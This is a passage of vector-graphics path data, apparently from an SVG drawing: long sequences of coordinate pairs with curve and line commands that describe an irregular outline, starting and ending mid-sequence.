1049.0269,155.68937 1046.2647,157.93363 1046.7589,160.51933 C 1047.0711,162.15229 1047.7071,162.62784 1049.094,162.26517 C 1050.1423,161.99103 1051,162.2296 1051,162.79531 C 1051,164.52597 1055.7695,163.4183 1059.7987,160.75189 C 1064.8388,157.41653 1076.9638,145.11652 1078.1015,142.1849 C 1078.5957,140.9116 1079,138.6042 1079,137.05735 C 1079,135.51049 1079.6323,133.72013 1080.4051,133.07876 C 1082.2498,131.54777 1081.9306,129.91523 1079.2168,127.00237 C 1076.6033,124.19711 1074.3541,123.63493 1073.6005,125.59863 C 1073.051,127.03061 1069.3718,127.46363 1066.6449,126.41724 C 1065.8097,126.09672 1065.359,125.22793 1065.6435,124.48659 C 1066.0009,123.55522 1065.1316,123.03758 1062.8304,122.81145 L 1059.5,122.4842 L 1064.75,119.72525 C 1067.6375,118.20783 1070,116.56033 1070,116.06414 C 1070,115.56794 1073.9328,113.01818 1078.7396,110.398 L 1087.4792,105.63403 L 1097.9896,105.5329 C 1103.7703,105.47727 1108.9573,105.14806 1109.5163,104.80132 C 1110.0752,104.45458 1112.7752,104.63691 1115.5163,105.2065 C 1123.7273,106.91276 1126.8036,106.85923 1127.2893,105.00163 C 1127.5272,104.0921 1130.2526,101.91965 1133.3457,100.17397 C 1137.7986,97.660904 1140.1304,97 1144.5439,97 C 1147.6097,97 1149.8855,97.37624 1149.6013,97.836088 C 1149.3171,98.295937 1146.835,98.476446 1144.0855,98.23722 C 1140.2322,97.90195 1138.4463,98.253229 1136.2932,99.769936 C 1134.7569,100.85216 1132.4875,102.05197 1131.25,102.43619 C 1128.5988,103.25935 1128.3395,104.53257 1130.6431,105.41655 C 1133.4096,106.47815 1131.6404,107.00927 1123.4,107.5909 C 1118.2675,107.95317 1115.9768,107.81505 1116.861,107.19662 C 1117.8545,106.50178 1117.2305,106.12898 1114.5503,105.81608 C 1112.5309,105.58032 1110.7044,105.66932 1110.4914,106.01386 C 1110.2785,106.35839 1104.9868,106.66781 1098.732,106.70144 C 1089.9382,106.74873 1086.5821,107.16124 1083.9299,108.52083 C 1082.0434,109.48786 1080.275,110.57932 1080,110.94631 C 1079.725,111.31329 1078.0375,112.20509 1076.25,112.92809 C 1074.4625,113.65109 1073,114.62894 1073,115.10109 C 1073,115.57324 1070.6375,117.31442 1067.75,118.97039 C 1063.341,121.4989 1062.9085,121.98274 1065.05,121.99062 C 1066.4525,121.99578 1068.14,121.46 1068.8,120.8 C 1069.7333,119.86667 1070.2667,119.86667 1071.2,120.8 C 1072.1333,121.73333 1072.1333,122 1071.2,122 C 1070.54,122 1070,122.675 1070,123.5 C 1070,125.19092 1071.5645,125.51368 1072.4914,124.01396 C 1073.2828,122.73335 1076.3588,123.22292 1078.4558,124.96328 C 1080.5529,126.70376 1085.6929,126.73677 1087.2833,125.01996 C 1088.1578,124.07595 1088.1679,123.89305 1087.3191,124.36961 C 1086.6696,124.73427 1085.8288,124.53202 1085.4507,123.92018 C 1085.0148,123.21486 1085.4469,122.95615 1086.6316,123.21326 C 1087.6592,123.4363 1088.3717,124.20192 1088.2149,124.91465 C 1088.0581,125.62738 1088.3746,126.74639 1088.9181,127.40135 C 1089.4617,128.0563 1089.8374,129.5082 1089.7531,130.6278 C 1089.5552,133.25489 1092.8846,142 1094.0827,142 C 1094.5872,142 1095,142.46583 1095,143.03518 C 1095,143.74876 1094.3991,143.74876 1093.0657,143.03518 C 1089.9457,141.36539 1088.0807,141.83032 1087.4254,144.44127 C 1086.9988,146.14102 1087.4381,147.55387 1088.8718,149.09272 C 1090.0042,150.30831 1090.639,151.77507 1090.2823,152.35219 C 1089.8505,153.05083 1089.5001,153.00022 1089.2336,152.20075 C 1088.6482,150.44473 1086.3157,150.73493 1085.5787,152.65546 C 1084.312,155.9564 1092.2743,161.20121 1095.4943,159.18696 C 1096.0474,158.84095 1097.3052,158.43247 1098.2893,158.27921 C 1099.2734,158.12595 1101.843,157.10043 1103.9995,156.00028 C 1108.2967,153.80801 1109.0128,153.62803 1108.9742,154.75 C 1108.9503,155.44368 1104.0049,157.90134 1099.6462,159.3856 C 1098.5245,159.76759 1098.0175,160.60332 1098.3624,161.50202 C 1098.7882,162.61157 1097.9092,163.1508 1094.8869,163.63408 C 1092.6619,163.98986 1090.3571,165.05661 1089.765,166.00461 C 1088.7668,167.60309 1088.4852,167.61152 1085.8877,166.12075 C 1081.8303,163.79215 1080.6825,165.54965 1083.0742,170.42856 C 1085.474,175.32405 1085.5003,177.49973 1083.1875,179.8125 C 1082.1906,180.80937 1081.5582,182.17451 1081.782,182.84612 C 1082.0059,183.51774 1081.6888,184.67008 1081.0773,185.40687 C 1080.4658,186.14367 1080.2332,187.44403 1080.5603,188.29656 C 1081.1938,189.94753 1077.6538,192.52211 1076.0841,191.55199 C 1075.6031,191.25471 1074.9132,191.78379 1074.551,192.72772 C 1073.9865,194.19872 1073.7594,194.23362 1072.9615,192.97197 C 1072.3638,192.02681 1072.0251,191.93614 1072.0153,192.71862 C 1072.0068,193.39338 1071.3249,193.67816 1070.4873,193.35674 C 1069.6553,193.03747 1068.3053,193.33169 1067.4873,194.01057 C 1066.6693,194.68945 1066,194.86466 1066,194.39994 C 1066,193.93522 1065.3054,194.54668 1064.4564,195.75875 C 1063.1271,197.65666 1062.6232,197.79163 1060.8258,196.73126 C 1059.1655,195.75177 1058.6457,195.75688 1058.2839,196.75623 C 1058.0338,197.44716 1057.3493,197.71591 1056.7629,197.35346 C 1056.1764,196.991 1055.1115,197.49464 1054.3963,198.47265 C 1053.6812,199.45066 1052.4543,200.00457 1051.6699,199.70357 C 1049.9239,199.03358 1048,200.80544 1048,203.08337 C 1048,204.82525 1045.4421,205.99145 1043.2438,205.25183 C 1042.5528,205.01937 1042.213,204.46445 1042.4885,204.01867 C 1042.764,203.57289 1042.3398,201.95609 1041.5459,200.42578 C 1040.0948,197.62875 1040.3637,195.48871 1042.0364,196.52249 C 1042.5304,196.8278 1043.5076,196.16014 1044.2078,195.0388 C 1044.9081,193.91746 1045.8659,193 1046.3362,193 C 1046.8065,193 1048.3972,192.14131 1049.8711,191.09181 C 1051.345,190.0423 1053.6644,189.16933 1055.0254,189.15188 C 1061.6268,189.06723 1062.6429,188.67485 1064.806,185.375 C 1066.0228,183.51875 1067.4908,182 1068.0682,182 C 1068.6456,182 1068.8399,182.45 1068.5,183 C 1067.7915,184.14634 1068.2099,184.24043 1070.3551,183.41724 C 1071.1903,183.09672 1071.6465,182.24224 1071.3687,181.51839 C 1071.0909,180.79454 1071.3443,179.90523 1071.9318,179.54213 C 1072.5193,179.17904 1073,179.42827 1073,180.09597 C 1073,180.85389 1073.743,180.6376 1074.9776,179.52023 C 1076.0654,178.53587 1076.9243,176.77863 1076.8864,175.61524 C 1076.8485,174.45186 1077.05,172.04335 1077.3343,170.263 C 1077.6185,168.48264 1077.4346,166.76859 1076.9255,166.45398 C 1075.4535,165.5442 1075.8521,164 1077.559,164 C 1078.4165,164 1078.8399,163.55 1078.5,163 C 1078.1601,162.45 1078.7782,162 1079.8736,162 C 1080.969,162 1082.1073,161.2125 1082.4032,160.25 C 1083.9515,155.21384 1085.0374,135.67849 1083.8737,133.79566 C 1082.8916,132.20657 1079.8545,134.72211 1080.122,136.90309 C 1080.6057,140.84647 1078.1469,144.76473 1070.1207,152.84083 C 1060.648,162.37234 1055.0888,165.61769 1050.108,164.52372 C 1048.1555,164.09487 1047,164.23532 1047,164.90149 C 1047,165.48471 1045.875,166.24425 1044.5,166.58936 C 1042.7642,167.025 1042,167.90149 1042,169.45653 C 1042,171.10225 1040.9391,172.17463 1038,173.5 C 1035.8,174.49206 1034,175.43536 1034,175.59622 C 1034,175.75708 1035.5729,177.60124 1037.4952,179.69435 C 1040.5928,183.06702 1041.7799,186.41012 1040.977,189.5 C 1040.8341,190.05 1040.7529,191.2875 1040.7964,192.25 C 1040.84,193.2125 1040.4271,194 1039.8788,194 C 1039.3306,194 1039.1827,193.51338 1039.5503,192.91862 C 1040.2663,191.76017 1035.9026,191.97912 1035,193.14694 C 1034.725,193.50276 1033.375,193.95276 1032,194.14694 C 1029.7423,194.46579 1029.5,194.16082 1029.5,191 C 1029.5,189.075 1029.1552,186.96859 1028.7337,186.3191 C 1028.3122,185.6696 1028.4247,184.85554 1028.9837,184.51008 C 1030.769,183.40672 1030.0725,181.74777 1028.0465,182.2776 C 1026.972,182.55857 1025.4178,182.27355 1024.5926,181.64423 C 1022.5322,180.07288 1024.869,176.672 1027.0576,178.05674 C 1028.0543,178.68739 1028.1138,178.97411 1027.25,178.98469 C 1026.5625,178.99311 1026,179.42231 1026,179.93847 C 1026,180.9487 1034.7863,180.54699 1035.845,179.48836 C 1036.1961,179.13726 1035.6996,178.41139 1034.7417,177.87531 C 1031.9317,176.30276 1032.7181,174.43086 1037,172.5 C 1039.5731,171.33969 1041,170.03698 1041,168.84813 C 1041,166.58486 1038.7143,166.4344 1036.9333,168.58041 C 1036.1622,169.5095 1034.6595,169.97689 1033.287,169.71452 C 1032.0029,169.46906 1030.684,169.70231 1030.3561,170.23286 C 1030.0282,170.76341 1028.3514,171.81648 1026.63,172.57301 C 1023.6502,173.88251 1023.6074,173.9792 1025.7388,174.58795 C 1026.9701,174.93964 1027.7476,175.59934 1027.4666,176.05396 C 1027.1857,176.50859 1025.5387,176.38656 1023.8067,175.78279 C 1021.1265,174.84846 1020.0105,175.02835 1016.3107,176.99108 C 1011.2428,179.6796 1009.8754,179.02463 1012.1785,175.01179 C 1013.0809,173.43928 1013.5856,171.91893 1013.2999,171.63323 C 1012.6692,171.00256 1005.9121,174.52412 1005.0375,175.93932 C 1004.6941,176.49491 1003.3315,177.11457 1002.0094,177.31634 C 998.57811,177.83999 998.36028,179.79595 1001.6907,180.17786 C 1003.646,180.40208 1004.4578,181.03196 1004.3611,182.25 C 1004.19,184.40632 1004.9166,184.44714 1007.7792,182.44207 C 1009.0026,181.5852 1010.451,181.16072 1010.998,181.49876 C 1011.545,181.83681 1012.9551,182.29876 1014.1315,182.52533 C 1016.835,183.04598 1017.372,183.58914 1016.5299,184.95157 C 1016.0863,185.66946 1014.8508,185.31786 1012.8761,183.91175 C 1010.0403,181.89252 1009.798,181.87286 1007.9835,183.51492 C 1005.9624,185.34397 1002.8034,184.89256 1003.2407,182.83722 C 1003.3833,182.16708 1002.6,181.43588 1001.5,181.21233 C 998.43884,180.59021 997.52546,179.27671 998.95569,177.55339 C 999.6547,176.71114 1000.5727,176.23593 1000.9958,176.49739 C 1001.4188,176.75884 1002.9013,176.07888 1004.2902,174.98637 C 1005.6791,173.89387 1007.2519,173 1007.7853,173 C 1008.3187,173 1009.2902,172.35523 1009.9443,171.56717 C 1011.3812,169.83576 1014.7568,169.92396 1015.4425,171.71084 C 1015.7146,172.41988 1015.4748,173 1014.9096,173 C 1014.3444,173 1014.1601,173.45 1014.5,174 C 1014.8399,174.55 1014.5665,175 1013.8924,175 C 1013.2182,175 1012.933,175.26631 1013.2585,175.5918 C 1014.4721,176.8054 1030,170.66902 1030,168.97583 C 1030,168.39364 1031.0645,168.22908 1032.5,168.58936 C 1034.0404,168.97597 1035,168.79137 1035,168.10841 C 1035,167.49878 1035.5749,167 1036.2775,167 C 1036.9801,167 1038.6676,166.22021 1040.0275,165.26712 C 1041.3874,164.31404 1043.3528,163.67838 1044.395,163.85455 C 1046.0383,164.13231 1046.2148,163.71108 1045.7235,160.68354 C 1045.1315,157.03579 1046.4035,155.90099 1051.4094,155.61072 C 1053.2463,155.5042 1058.7287,147.39533 1057.6757,146.34235 C 1057.4111,146.07781 1055.4436,146.38602 1053.3034,147.02724 C 1048.8839,148.35136 1044.3969,147.99529 1044.7103,146.34533 C 1045.1831,143.85609 1040.4854,141.49242 1034.25,141.08223 C 1033.5625,141.037 1033,140.4131 1033,139.69578 C 1033,138.97846 1031.6973,136.33741 1030.1051,133.82679 C 1027.783,130.16528 1026.4474,129.10001 1023.3551,128.44327 C 1019.3735,127.59767 1012.9359,127.70949 1009.5871,128.68242 C 1007.7991,129.20189 1007.7883,129.30202 1009.4216,130.21606 C 1011.0482,131.12635 1011.0207,131.33209 1009.0232,133.193 C 1007.8431,134.29248 1006.4662,136.27384 1005.9635,137.59603 C 1005.4261,139.00939 1004.2395,140 1003.0838,140 C 1002.0026,140 1000.8392,140.45122 1000.4983,141.0027 C 1000.0888,141.66532 999.19182,141.63784 997.85367,140.92168 C 995.59728,139.71411 995.70631,139.66242 994.13545,142.68426 C 992.31623,146.18388 992.72439,146.57747 997.86555,146.28111 C 1001.6104,146.06524 1003.3573,146.49322 1005.4498,148.13921 C 1008.3529,150.42276 1007.4624,152.19518 1003.8824,151.25899 C 1001.9078,150.74263 995.94572,152.73741 994.89629,154.26554 C 994.04783,155.50102 987.25428,157.23694 982.5,157.43309 C 978.99486,157.57771 978.53021,157.87458 978.74417,159.83269 C 978.8947,161.21034 978.31949,162.30438 977.24417,162.68562 C 976.28488,163.02573 974.73067,163.9639 973.79038,164.77044 C 972.82354,165.59976 970.21673,166.20463 967.79038,166.16265 C 965.43067,166.12183 961.15916,166.81888 958.29813,167.71166 C 953.4789,169.2155 952.71648,169.21225 947.93329,167.66745 C 945.09366,166.75035 940.45951,165.97318 937.63517,165.94039 C 928.80836,165.83792 923.03353,164.49289 921.39858,162.15866 C 919.17781,158.98808 916.14572,157.62405 910,157.03086 C 904.6894,156.51828 904.51007,156.4043 904.7924,153.72097 C 905.09195,150.87399 904.01864,149.24733 900.5,147.21564 C 898.5,146.06082 898.5,146.06082 900.5,146.06183 C 903.32058,146.06327 906.3369,150.52155 905.57395,153.5614 C 904.99697,155.86026 905.20593,156 909.22044,156 C 914.60728,156 921.42407,158.7768 922.59883,161.44964 C 923.3521,163.1635 924.81293,163.62638 931.5,164.27007 C 935.9,164.69361 941.75,165.49443 944.5,166.04967 C 952.78382,167.72222 955.32547,167.78204 959.27108,166.39731 C 961.34517,165.6694 965.07138,165.11457 967.55153,165.16436 C 970.42026,165.22194 972.71516,164.66276 973.85919,163.62743 C 974.84825,162.73235 976.21111,162 976.88776,162 C 977.56441,162 977.83743,161.54597 977.49447,160.99105 C 977.15151,160.43613 977.16391,159.05893 977.52202,157.93061 C 978.05072,156.26482 978.71614,155.99838 981.06123,156.51345 C 983.77809,157.11017 989.64734,155.82186 993,153.89287 C 997.3341,151.3992 1001.7488,149.9236 1003.75,150.29974 C 1004.9875,150.53234 1006,150.4111 1006,150.03031 C 1006,148.50833 1001.2591,147.03046 997.20467,147.28856 C 991.47866,147.65308 990.30626,146.82854 992.36707,143.88632 C 993.26518,142.60409 994,141.22551 994,140.82281 C 994,139.43058 987.23179,138.80558 985.01319,139.99294 C 979.55246,142.91544 969.76688,143.00638 963.2325,140.19537 C 959.10339,138.41907 956.99883,138.1002 952.72192,138.60286 C 948.33892,139.118 947.04746,138.90461 945.56279,137.41993 C 944.5665,136.42364 941.4456,134.82792 938.62746,133.87388 C 933.94975,132.29032 933.35135,132.27705 931.75532,133.72143 C 930.53219,134.82835 930.31008,135.66869 931.01586,136.51911 C 932.79464,138.66241 929.32512,140.37226 923.71658,140.11634 C 920.8814,139.98698 918.09093,139.49043 917.51554,139.0129 C 916.94016,138.53537 914.48945,137.9172 912.06952,137.63919 C 908.68878,137.25079 906.55747,137.69729 902.86807,139.56685 C 900.2272,140.90508 897.37653,142 896.53324,142 C 894.51368,142 894.59263,142.9623 896.75,144.64221 C 898.37567,145.90809 898.35791,145.95818 896.5,145.34722 C 895.4,144.98549 893.96762,144.27928 893.31692,143.77786 C 891.71851,142.54614 887,145.69871 887,147.99838 C 887,150.01238 884.72989,150.84061 880.18882,150.48339 C 877.76502,150.29272 876.89585,150.71776 876.33369,152.36861 C 875.93451,153.54087 875.72894,155.11952 875.87689,155.87671 C 876.06785,156.85413 875.46972,157.08372 873.81463,156.66832 C 870.38035,155.80637 868.60556,157.29229 869.38067,160.38058 C 869.74987,161.85158 869.4836,163.95577 868.76602,165.23792 C 868.06971,166.48206 867.44839,167.62661 867.38531,167.78136 C 867.32223,167.93611 866.19871,168.26915 864.88861,168.52145 C 863.57851,168.77375 862.35512,169.43464 862.16997,169.99009 C 861.98482,170.54554 860.34398,171 858.52366,171 C 856.40706,171 854.99181,171.57896 854.59767,172.60607 C 854.17366,173.71102 853.2556,174.02998 851.65534,173.62834 C 850.09197,173.23596 848.61228,173.71256 847.14248,175.08189 C 844.90058,177.17054 845.05797,179 847.47956,179 C 848.2284,179 849.14301,180.2375 849.51202,181.75 C 849.88104,183.2625 851.70449,185.77108 853.56414,187.32461 C 856.68094,189.92836 857.20622,190.05488 860.28188,188.94271 C 863.00563,187.95779 864.12821,188.0033 866.39408,189.19051 L 869.16974,190.64483 L 866.51952,193.79443 C 864.49966,196.1949 864.10041,197.35701 864.84096,198.68029 C 865.54832,199.94428 865.38854,200.72662 864.25353,201.55656 C 863.39604,202.18358 863.01897,203.22168 863.41561,203.86345 C 864.4277,205.50106 870.78053,208.02145 872.36429,207.4137 C 873.0877,207.13611 874.25677,207.60446 874.96223,208.45449 C 875.66769,209.30452 876.86479,210 877.62244,210 C 878.3801,210 879,210.525 879,211.16667 C 879,211.80833 879.2867,212.04663 879.63712,211.69621 C 879.98754,211.34579 881.55329,211.96985 883.11657,213.083 C 884.67985,214.19616 886.98064,215.33334 888.22945,215.61008 C 891.78952,216.399 898.53948,216.40265 899.81174,215.61635 C 900.44657,215.224 902.66113,215.24202 904.73299,215.65639 C 910.29878,216.76953 910.21679,216.78459 914,213.95455 C 918.10145,210.88646 923.47677,210.56396 925.45356,213.26737 C 926.16434,214.23942 927.4115,214.77932 928.22502,214.46714 C 930.15542,213.72638 933,218.06056 933,221.74258 C 933,223.33757 932.11561,225.31275 930.95745,226.3044 C 928.53028,228.38262 929.31791,230.35126 932.20939,229.43354 C 933.48838,229.02761 934.01358,229.169 933.61604,229.81225 C 933.26711,230.37683 933.68944,231.54659 934.55457,232.41171 C 935.41969,233.27683 935.88444,234.37797 935.58734,234.85868 C 934.9121,235.95124 938.77318,239.56015 939.66412,238.66921 C 940.02264,238.31069 940.92511,238.52288 941.6696,239.14076 C 942.75058,240.03789 942.97053,239.78436 942.76161,237.88208 C 942.59968,236.4076 942.97626,235.59525 943.75,235.75 C 944.4375,235.8875 945,235.62291 945,235.16203 C 945,234.70115 946.62725,234.26289 948.6161,234.18812 C 950.60496,234.11335 952.76284,233.61179 953.41138,233.07354 C 955.03779,231.72375 961.5,234.06177 961.5,236 C 961.5,237.10492 962.69036,237.51276 966.01938,237.54845 C 968.50504,237.5751 971.08329,237.93344 971.74881,238.34476 C 973.51463,239.43609 981.1917,236.93109 983.38463,234.54803 C 984.64781,233.17534 985.41293,232.89931 985.70495,233.71094 C 986.29351,235.34682 991.80677,234.22613 994.88486,231.84492 C 996.19653,230.83021 997.91059,230 998.69388,230 C 999.47716,230 999.89844,229.64468 999.63004,229.21041 C 999.36164,228.77613 1000.4588,227.53863 1002.0681,226.46041 C 1003.6775,225.38218 1004.9955,223.66476 1004.9971,222.64392 C 1004.9987,221.62308 1006.1293,219.89954 1007.5095,218.81385 C 1008.8898,217.72815 1009.7202,216.35636 1009.355,215.76542 C 1008.9589,215.12445 1009.1615,214.98177 1009.8572,215.41177 C 1010.6064,215.87477 1011.2249,215.12535 1011.5867,213.31628 C 1012.3307,209.59635 1011.8697,208.47014 1009.75,208.82924 C 1007.1213,209.27459 1007.6436,207.30626 1010.3333,206.63119 C 1011.6167,206.30909 1012.6667,205.38531 1012.6667,204.57833 C 1012.6667,203.77136 1012.4042,203.1394 1012.0833,203.17398 C 1009.7039,203.43041 1007.9879,202.82852 1008.5421,201.93183 C 1008.9052,201.34433 1009.8318,201.10521 1010.6012,201.40044 C 1011.3705,201.69568 1012,201.50135 1012,200.96862 C 1012,200.43588 1011.5266,200 1010.948,200 C 1010.3694,200 1009.4318,198.66839 1008.8644,197.04086 C 1008.297,195.41333 1006.9704,193.80801 1005.9164,193.47347 C 1004.8624,193.13894 1004,192.53098 1004,192.12245 C 1004,190.40566 1010.4081,185.00563 1012.3687,185.07029 C 1014.0118,185.12447 1014.1412,185.29626 1012.9336,185.82029 C 1010.5415,186.85833 1006,190.67896 1006,191.65337 C 1006,192.12942 1006.9,193.08097 1008,193.76793 C 1009.1,194.45489 1010,195.70962 1010,196.55622 C 1010,197.40282 1011.0151,199.08651 1012.2557,200.29775 C 1014.8723,202.85231 1015.1208,204.99586 1013,206.7182 C 1011.5716,207.87828 1011.6977,208.08721 1014,208.375 C 1015.337,208.54212 1015.389,208.95234 1014.5549,212.75 C 1014.1623,214.5375 1013.2385,216 1012.5021,216 C 1011.0325,216 1006.6667,222.46236 1006.6667,224.63771 C 1006.6667,225.38697 1006.3996,226 1006.0731,226 C 1005.7467,226 1004.3592,227.02735 1002.9898,228.283 C 998.38973,232.501 991.41225,235.9412 986.5,236.41318 C 985.95,236.46603 984.6,237.01045 983.5,237.62301 C 982.4,238.23557 979.85595,239.03322 977.84655,239.39557 C 975.83715,239.75793 973.92981,240.74053 973.60801,241.57914 C 973.2862,242.41774 973.4206,242.85809 973.90667,242.55768 C 975.31427,241.68774 976.03015,244.79051 975.02923,247.42311 C 974.01607,250.08793 971.18779,251.39303 968.58801,250.3954 C 966.32654,249.52759 966.93076,245.83489 969.54855,244.52503 C 970.95363,243.82197 971.42479,242.87178 971.04855,241.5 C 970.5436,239.65898 969.48417,239.35959 965.21667,239.85194 C 964.51083,239.93337 962.32562,241.60771 960.36064,243.57269 L 956.78795,247.14538 L 958.90312,249.39688 C 960.06647,250.6352 960.83039,251.83999 960.60072,252.07419 C 960.37106,252.30838 961.70456,253.625 963.56405,255 C 965.42354,256.375 966.95733,258.025 966.97247,258.66667 C 966.98761,259.30833 967.50716,260.00239 968.12702,260.20901 C 968.74688,260.41563 969.60392,262.81563 970.03156,265.54234 C 970.94317,271.35505 969.74755,274.61656 965.85735,276.92908 C 964.4039,277.79309 961.11884,279.9625 958.55722,281.75 C 955.9956,283.5375 953.77523,285 953.62306,285 C 953.47089,285 953.55506,283.57821 953.81011,281.84047 C 954.18187,279.30751 953.97032,278.79741 952.74337,279.26824 C 951.18638,279.86571 947,276.27388 947,274.34054 C 947,272.69747 943.65621,270.2236 941.84004,270.52298 C 940.87733,270.68167 939.87891,269.89423 939.46309,268.6483 C 938.76961,266.57043 938.73073,266.58196 938.27723,269 C 938.01935,270.375 937.42122,271.97233 936.94804,272.54961 C 935.62741,274.16082 934.49933,282.42747 935.70148,281.6845 C 936.75684,281.03225 939,285.03591 939,287.5718 C 939,288.38454 940.08096,289.46048 941.40214,289.96279 C 942.72332,290.4651 945.19832,292.2388 946.90214,293.90434 C 949.28422,296.2329 950.00086,297.80684 950.00374,300.7163 C 950.00579,302.79733 950.93004,306.01325 952.05763,307.86278 C 953.18521,309.71231 953.83406,311.49928 953.49951,311.83382 C 953.16497,312.16836 952.57822,312.00511 952.19563,311.47104 C 951.20753,310.09174 944.9527,306.71397 944.40355,307.26312 C 944.15166,307.51501 945.53518,308.93356 947.47805,310.41546 C 950.42586,312.66387 950.90277,313.53921 950.35943,315.70406 C 949.90276,317.52356 950.05051,318.08682 950.85416,317.59014 C 951.48437,317.20064 952,316.23352 952,315.44098 C 952,314.64844 952.675,314 953.5,314 C 955.4345,314 955.44766,315.89099 953.51831,316.63135 C 952.37701,317.06931 952.27817,317.65124 953.08805,319.16453 C 953.9105,320.70129 954.44142,320.87855 955.52593,319.97848 C 957.21154,318.57955 959.33837,319.67583 958.61185,321.56913 C 958.32337,322.32088 958.58722,323.24489 959.19818,323.62248 C 959.87084,324.03821 960.02756,323.85361 959.59549,323.15451 C 959.20305,322.51953 959.33197,322 959.88197,322 C 960.43197,322 961.10383,322.35899 961.375,322.79775 C 962.0435,323.87941 960.26722,326.62638 959.30432,326 C 958.88157,325.725 958.38022,327.6375 958.19021,330.25 C 957.85367,334.87704 957.91792,335.00016 960.67236,335.00616 C 962.22756,335.00955 964.78894,335.68455 966.36431,336.50616 C 969.66783,338.22906 973.598,338.45946 974.51008,336.98369 C 974.85554,336.42472 975.6696,336.3042 976.3191,336.71587 C 976.96859,337.12755 979.75,337.7297 982.5,338.054 C 987.17822,338.60568 987.33911,338.71537 985,339.75842 L 982.5,340.87323 L 985.08333,340.93661 C 986.50417,340.97148 987.96489,341.29823 988.32939,341.66272 C 988.69389,342.02722 990.45639,342.48138 992.24606,342.67195 C 994.03573,342.86253 996.12304,343.8018 996.88453,344.75923 C 998.19907,346.41199 998.23857,346.41153 997.66592,344.75 C 997.33419,343.7875 997.23684,343 997.4496,343 C 997.66235,343 998.62205,342.69853 999.58226,342.33006 C 1000.6303,341.92789 1001.0825,342.05742 1000.7138,342.65412 C 1000.3759,343.20082 1001.044,343.61479 1002.1985,343.57406 C 1003.353,343.53333 1004.4931,344.0625 1004.7321,344.75 C 1005.132,345.9002 1000.7455,346.61643 996,346.17579 C 990.91856,345.70396 990,345.47419 990,344.6749 C 990,344.18602 990.7875,344.08583 991.75,344.45226 C 993.19551,345.00257 993.27079,344.89069 992.18268,343.80925 C 991.09634,342.72956 990.62582,342.8244 989.49921,344.35014 C 988.65649,345.49142 987.64286,345.89731 986.85361,345.40952 C 986.1499,344.97461 983.30746,344.48374 980.53707,344.31871 C 977.76668,344.15367 974.375,343.59604 973,343.07952 C 971.625,342.56301 967.9125,341.85143 964.75,341.49824 C 961.5875,341.14506 959,340.43847 959,339.92804 C 959,339.41762 958.0449,339 956.87756,339 C 955.05871,339 954.94223,338.77454 956.06325,337.42378 C 957.14616,336.11897 957.12874,335.6976 955.96209,334.97657 C 955.14279,334.47021 954.31215,334.49492 953.978,335.0356 C 953.00724,336.60632 941.39089,324.81393 938.48533,319.30815 C 936.97839,316.45263 935.12771,313.87925 934.37272,313.58953 C 933.61772,313.29981 933,312.34632 933,311.47066 C 933,310.59501 930.075,307.02467 926.5,303.53659 C 920.23537,297.42426 918.41885,294 921.44098,294 C 922.23352,294 923.11447,294.3762 923.39864,294.836 C 923.68281,295.2958 924.88558,295.60052 926.07145,295.51315 C 927.45913,295.41092 930.12298,297.21965 933.54577,300.58818 C 938.78397,305.74332 943,308.18673 943,306.06739 C 943,305.48032 942.65985,305 942.24411,305 C 941.30607,305 939.47378,300.79513 938.0857,295.45703 C 936.95019,291.09018 933.46299,286.59582 931.94039,287.53684 C 930.89778,288.18121 930.68301,286.47201 931.05613,280.5 C 931.56608,272.33809 931.50295,267.81084 930.87377,267.42199 C 930.5179,267.20204 929.91077,265.3379 929.5246,263.27945 C 929.13844,261.22101 928.38576,258.72081 927.852,257.72346 C 926.92212,255.98597 926.7459,255.99392 923.63993,257.91352 C 921.68533,259.12153 919.52522,259.6886 918.19917,259.34183 C 916.98963,259.02553 916,258.70375 916,258.62677 C 916,258.54978 916.42559,257.00286 916.94575,255.18915 C 917.72999,252.45468 917.55921,251.55921 915.94575,249.94575 C 914.87559,248.87559 914,247.34083 914,246.53518 C 914,245.72953 913.0651,244.57002 911.92244,243.95849 C 910.68895,243.29835 910.07488,242.24725 910.41099,241.37137 C 910.73146,240.53622 910.54511,240.1631 909.98148,240.51144 C 909.07198,241.07355 908.74796,240.52144 907.35027,236.02803 C 906.96185,234.77929 906.76103,234.76862 906.02617,235.95765 C 905.15712,237.36381 904.0662,237.75164 898.5,238.63326 C 892.71073,239.55021 891.01271,240.04157 891.12428,240.76758 C 891.48543,243.11755 890.63097,244.25624 887.53607,245.54938 C 885.6309,246.34541 883.63604,247.78494 883.10303,248.74835 C 882.57002,249.71176 880.75508,251.4 879.06984,252.5 C 877.38459,253.6 876.00446,255.0625 876.00288,255.75 C 876.00129,256.4375 875.3801,257 874.62244,257 C 873.86479,257 872.66769,257.69548 871.96223,258.54551 C 871.25677,259.39554 870.0511,259.84985 869.28296,259.55509 C 868.18684,259.13447 867.91697,260.14669 868.0287,264.25958 C 868.107,267.14181 867.84592,271.43037 867.44853,273.78972 C 866.85854,277.29258 867.08413,278.48487 868.67839,280.28972 C 871.26701,283.22029 874,287.67551 874,288.96482 C 874,290.50978 870.2143,294 868.53854,294 C 866.52996,294 864.70268,286.91221 865.89963,283.76398 C 866.44758,282.32278 866.45882,280.75633 865.92725,279.91653 C 865.11671,278.636 864.57743,279.32371 864.88158,281.25 C 864.94671,281.6625 864.1,282 863,282 C 861.70435,282 861,282.66667 861,283.89301 C 861,288.30844 854.99802,285.93358 853.54743,280.94418 C 853.15659,279.59988 851.8093,276.25 850.55346,273.5 C 843.46559,257.97928 840.54455,249.02875 841.03703,244.34011 C 841.40744,240.81366 840.99728,238.45613 840.22467,239.67072 C 838.53899,242.3207 834.41279,242.21822 831.11639,239.44449 C 829.35624,237.96342 828.08347,236.24959 828.28801,235.63597 C 828.69281,234.42156 824.85813,231 823.09227,231 C 822.49152,231 822,230.51786 822,229.92857 C 822,226.8292 819.09066,225.94843 810.29563,226.38517 C 805.45803,226.6254 798.35391,226.29951 794.50869,225.66097 C 788.39262,224.64534 787.35215,224.154 786.1975,221.73616 C 784.98754,219.20252 784.70799,219.09112 782.84123,220.39865 C 780.64637,221.936 773.74183,221.62523 773.16667,219.96321 C 772.98333,219.43345 772.19583,219 771.41667,219 C 770.6375,219 770,218.55 770,218 C 770,217.45 769.08588,217 767.96862,217 C 766.85135,217 765.64976,216.2125 765.2984,215.25 C 764.21456,212.28095 761.57479,209.45514 760,209.57818 C 755.87642,209.90035 755.77975,209.98633 756.46623,212.72147 C 756.8419,214.21827 758.71003,216.95872 760.61761,218.81134 C 762.5252,220.66397 764.3464,223.482 764.66473,225.07364 C 764.98306,226.66529 765.63994,227.72253 766.12446,227.42308 C 766.61691,227.11873 766.5477,226.02338 765.96752,224.93931 C 765.39668,223.87269 765.17047,223 